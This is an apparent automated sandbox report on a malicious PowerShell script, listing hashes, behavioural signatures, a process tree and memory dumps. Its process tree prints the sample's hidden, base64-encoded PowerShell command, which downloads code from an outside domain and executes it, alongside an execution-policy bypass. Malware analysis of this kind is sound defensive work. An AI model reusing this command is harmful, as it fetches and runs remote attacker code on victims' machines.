d58dc2ab26df5783442b79e3edb7826599494b28f3c75fa3823cbc876f3707da | Triage

Analysis

max time kernel
19s
max time network
135s
platform
windows10_x64
resource
win10v20210408
submitted
25-08-2021 20:27

Sharing

Report Analysis Logs

General

Target

4bd/work.ps1
Size

1.4MB
MD5

7ba4b5c5d3e3276a3cfe8d581cf7173b
SHA1

79ba87b46562e75f097c1b6d23d3b63b9160bbaa
SHA256

73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
SHA512

ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
11	804	powershell.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2144	804	WerFault.exe	79

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
580	powershell.exe
580	powershell.exe
580	powershell.exe
804	powershell.exe
804	powershell.exe
804	powershell.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe
2144	WerFault.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	580	powershell.exe
Token: SeDebugPrivilege	804	powershell.exe
Token: SeDebugPrivilege	2144	WerFault.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 580 wrote to memory of 804	580	powershell.exe	79
PID 580 wrote to memory of 804	580	powershell.exe	79

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\4bd\work.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:580
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:804
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 804 -s 2488
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2144

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

memory/580-118-0x0000017B30350000-0x0000017B30351000-memory.dmp

Filesize
4KB

Download
memory/580-123-0x0000017B303E3000-0x0000017B303E5000-memory.dmp

Filesize
8KB

Download
memory/580-121-0x0000017B303E0000-0x0000017B303E2000-memory.dmp

Filesize
8KB

Download
memory/580-124-0x0000017B30EB0000-0x0000017B30EB1000-memory.dmp

Filesize
4KB

Download
memory/580-142-0x0000017B303E6000-0x0000017B303E8000-memory.dmp

Filesize
8KB

Download
memory/580-173-0x0000017B303E8000-0x0000017B303E9000-memory.dmp

Filesize
4KB

Download
memory/804-171-0x000001CFFECE0000-0x000001CFFECE2000-memory.dmp

Filesize
8KB

Download
memory/804-172-0x000001CFFECE3000-0x000001CFFECE5000-memory.dmp

Filesize
8KB

Download
memory/804-182-0x000001CFFECE6000-0x000001CFFECE8000-memory.dmp

Filesize
8KB

Download